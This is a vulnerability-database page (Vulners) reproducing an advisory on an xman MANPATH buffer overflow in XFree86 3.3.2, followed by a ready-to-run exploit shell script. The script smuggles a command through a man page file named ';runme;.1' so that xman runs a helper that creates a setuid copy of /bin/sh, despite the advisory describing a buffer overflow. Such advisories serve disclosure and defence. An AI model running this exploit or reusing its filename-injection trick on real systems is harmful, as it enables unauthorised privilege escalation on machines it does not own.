Vulners
Lucene search
XFree86 X11R6 3.3.2 XMan ManPath Environment Variable Buffer Overflow
source: http://www.securityfocus.com/bid/3030/info
xman is a component included with the XFree86 Window System.
A buffer overflow in the handling of the MANPATH environment variable by xman makes it possible for a local user to execute arbitrary code. By inserting 70000 characters into the MANPATH variable, it is possible to overwrite stack variables, including the return address. xman is SGID man.
This problem makes it possible for a local user to execute arbitrary code, gaining elevated privileges, and potentially root access.
#!/bin/sh
# example of xman exploitation. xman
# supports privileges. but, never
# drops them.
# Vade79 -> [email protected] -> realhalo.org.
MANPATH=~/xmantest/
mkdir -p ~/xmantest/man1
cd ~/xmantest/man1
touch ';runme;.1'
cat << EOF >~/xmantest/runme
#!/bin/sh
cp /bin/sh ~/xmansh
chown `id -u` ~/xmansh
chmod 4755 ~/xmansh
EOF
chmod 755 ~/xmantest/runme
echo "click the ';runme;' selection," \
"exit. then, check for ~/xmansh."
xman -bothshown -notopbox
rm -rf ~/xmantest
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1